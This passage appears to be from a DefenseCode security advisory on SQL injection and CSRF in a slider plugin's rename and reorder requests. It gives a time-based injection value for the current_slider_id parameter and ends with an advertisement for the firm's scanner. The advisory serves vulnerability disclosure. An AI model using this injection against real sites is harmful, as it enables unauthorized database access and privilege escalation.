The easiest way to reproduce the vulnerabilities is to modify the POSTrequest for the slider rename or reorder and append parts of the SQLquery to the current_slider_id parameter, the result being somethinglike "current_slider_id=1 AND SLEEP(5)". Users that do not have fulladministrative privileges could abuse the database access thevulnerabilities provide to either escalate their privileges or obtainand modify database contents they were not supposed to be able to.

Due to the missing nonce token, the vulnerable code is also directlyexposed to attack vectors such as Cross Site request forgery (CSRF).

DefenseCode WebScanner is a DAST (Dynamic Application SecurityTesting, BlackBox Testing) solution for comprehensive security auditsof active web applications. WebScanner will test a website's securityby carrying out a large number of attacks using the most advancedtechniques, just as a real attacker would.